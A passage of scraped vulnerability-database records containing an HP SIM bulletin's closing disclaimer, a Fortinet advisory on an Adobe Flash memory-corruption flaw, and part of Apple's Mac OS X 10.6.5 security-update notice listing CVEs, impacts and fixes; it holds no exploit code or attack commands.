HP\r\ndoes not warrant that this information is necessarily accurate or complete for all\r\nuser situations and, consequently, HP will not be responsible for any damages\r\nresulting from user's use or disregard of the information provided in this Bulletin.\r\nTo the extent permitted by law, HP disclaims all warranties, either express or\r\nimplied, including the warranties of merchantability and fitness for a particular\r\npurpose, title and non-infringement."\r\n\r\nCopyright 2011 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or\r\nomissions contained herein. The information provided is provided "as is" without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates,\r\nsubcontractors or suppliers will be liable for incidental,special or consequential\r\ndamages including downtime cost; lost profits;damages relating to the procurement of\r\nsubstitute products or services; or damages for loss of data, or software\r\nrestoration. 
The information in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced herein\r\nare trademarks of Hewlett-Packard Company in the United States and other countries.\r\nOther product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk2t3CsACgkQ4B86/C0qfVnGsACfUBtF4ovPqqT+9fmlstfGZOEg\r\nYs0AoM8ROq3gELhOLCPEYCca+qCkf+pn\r\n=x5Sc\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SECURITYVULNS:DOC:26202", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26202", "title": "[security bulletin] HPSBMA02663 SSRT100428 rev.1 - HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Execution of Arbitrary Code, Denial of Se", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2011-1543", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2011-1542", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "description": "Cross-site scripting, cross-site request forgery, DoS.", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SECURITYVULNS:VULN:11619", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11619", "title": "HP Systems Insight Manager multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": 
"2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-3637"], "description": "[FG-VD-10-020]Adobe Flash Player Remote Memory corruption Vulnerability\r\n\r\n\r\nFortinet Discovers Adobe Flash Player Vulnerability\r\n2010.Nov.04\r\n\r\nSummary:\r\n\r\n Fortinet's FortiGuard Labs has discovered a Memory corruption vulnerability in Adobe Flash Player(Flash10h.ocx), which may lead to\r\narbitrary code \r\nexecution or Denial of Service.\r\n\r\nImpact:\r\n\r\n Arbitrary Code Execution or Denial of Service\r\n\r\nRisk:\r\n\r\n High\r\n\r\nAffected Software:\r\n\r\n Adobe Flash Player 10 all versions\r\n Adobe Flash Professional\r\n\r\nAdditional Information:\r\n\r\n A potential remote code execution vulnerability exists in Adobe Flash Player10(Flash10h.ocx).\r\n It'll crash browser when Adobe Flash Player(Flash10h.ocx) tries playing a malicious flv video. \r\n\r\nSolutions:\r\n\r\n * Users should apply the solution provided by Adobe(APSB10-26 http://www.adobe.com/support/security/bulletins/apsb10-26.html ). \r\n\r\n * FortiGuard Labs released a signature to protect against this vulnerability.\r\n\r\n\r\nFortinet customers who subscribe to Fortinet\u2019s intrusion prevention (IPS) service should be protected against this vulnerability.\r\nFortinet\u2019s IPS service is one component of FortiGuard Subscription Services, which also offer comprehensive solutions such as antivirus,\r\nWeb content filtering and antispam capabilities. These services enable protection against threats on both application and network layers.\r\nFortiGuard Services are continuously updated by the FortiGuard Global Security Research Team, which enables Fortinet to deliver a\r\ncombination of multi-layered security intelligence and true zero-day protection from new and emerging threats. These updates are\r\ndelivered to all FortiGate, FortiMail and FortiClient products. 
Fortinet strictly follows responsible disclosure guidelines to ensure\r\noptimum protection during a threat's lifecycle. \r\n\r\nReferences: \r\n\r\nAdobe Security Bulletin: http://www.adobe.com/support/security/bulletins/apsb10-26.html\r\nCVE ID: CVE-2010-3637 (FG-VD-10-020) \r\n\r\nAcknowledgment:\r\n\r\nXiaopeng Zhang of Fortinet's FortiGuard Labs\r\n\r\nDisclaimer:\r\n\r\nAlthough Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the\r\naccuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's\r\nproduct information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified\r\nas such in a duly signed writing.\r\n\r\nAbout Fortinet ( www.fortinet.com ):\r\n\r\nFortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems, which are used by\r\nenterprises and service providers to increase their security while reducing total operating costs. Fortinet solutions were built from the\r\nground up to integrate multiple levels of security protection--including firewall, antivirus, intrusion prevention, VPN, spyware\r\nprevention and anti-spam -- designed to help customers protect against network and content level threats. Leveraging a custom ASIC and\r\nunified interface, Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based solutions\r\nwith integrated management and reporting. Fortinet solutions have won multiple awards around the world and are the only security products\r\nthat are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). 
Fortinet is privately\r\nheld and based in Sunnyvale, California.\r\n\r\n\r\n", "edition": 1, "modified": "2010-11-08T00:00:00", "published": "2010-11-08T00:00:00", "id": "SECURITYVULNS:DOC:25091", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25091", "title": "[FG-VD-10-020]Adobe Flash Player Remote Memory corruption Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "cvelist": ["CVE-2010-2500", "CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-4010", "CVE-2010-2160", "CVE-2010-1449", "CVE-2010-1832", "CVE-2009-0796", "CVE-2010-3640", "CVE-2010-1845", "CVE-2010-2161", "CVE-2010-1841", "CVE-2010-3786", "CVE-2009-0946", "CVE-2010-1846", "CVE-2010-3785", "CVE-2010-1843", "CVE-2010-3796", "CVE-2010-1833", "CVE-2010-2176", "CVE-2010-3790", "CVE-2010-2941", "CVE-2010-2177", "CVE-2010-2484", "CVE-2010-3798", "CVE-2010-1205", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-0434", "CVE-2010-2531", "CVE-2010-1844", "CVE-2010-1828", "CVE-2010-3789", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-1836", "CVE-2010-2166", "CVE-2010-1834", "CVE-2010-2807", "CVE-2010-1450", "CVE-2010-1847", "CVE-2010-3053", "CVE-2010-2808", "CVE-2010-2173", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-1842", "CVE-2010-0212", "CVE-2010-2165", "CVE-2010-1840", "CVE-2010-2170", "CVE-2010-0001", "CVE-2010-3645", "CVE-2010-0408", "CVE-2010-3638", "CVE-2010-3788", "CVE-2010-2171", "CVE-2010-2520", "CVE-2010-2805", "CVE-2010-2249", "CVE-2010-2806", "CVE-2010-2184", "CVE-2010-1752", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3784", "CVE-2010-3794", "CVE-2010-1811", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3793", "CVE-2010-3054", "CVE-2010-2181", "CVE-2010-3797", "CVE-2010-2163", "CVE-2010-0105", "CVE-2010-2519", "CVE-2010-3976", "CVE-2010-1803", "CVE-2010-2183", "CVE-2010-1850", "CVE-2010-2216", "CVE-2010-0209", 
"CVE-2010-3791", "CVE-2010-2169", "CVE-2010-1831", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-1378", "CVE-2010-2179", "CVE-2010-2498", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-0211", "CVE-2009-2473", "CVE-2010-3783", "CVE-2010-1848", "CVE-2010-2185", "CVE-2010-1837", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-2474", "CVE-2010-2499", "CVE-2010-2497", "CVE-2009-3793", "CVE-2010-1830", "CVE-2010-1838", "CVE-2010-1829", "CVE-2010-2167", "CVE-2010-3795", "CVE-2010-3647", "CVE-2010-1849", "CVE-2010-0397", "CVE-2010-3643", "CVE-2010-2162", "CVE-2009-4134", "CVE-2009-2624", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-3792", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-0205", "CVE-2010-3787", "CVE-2010-2178"], "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nEmail this article\r\nPrint this page\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. 
To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shutdown\r\n\r\n Description: A null pointer dereference exists in AFP Server's handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shutdown. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. This issue is addressed through improved path validation. 
Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl's encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. 
Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services' handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. 
On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork's URL handling code. 
Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork's handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. 
Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText's handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol (IPP) requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. 
A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services' password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists in fsck_hfs' handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees. Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. 
Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. 
Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip's handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: An unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6. Credit to Steven Fisher of Discovery Software Ltd. 
for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO's handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. 
Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW's handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. 
Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast (PIM) packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. 
This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL's certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password 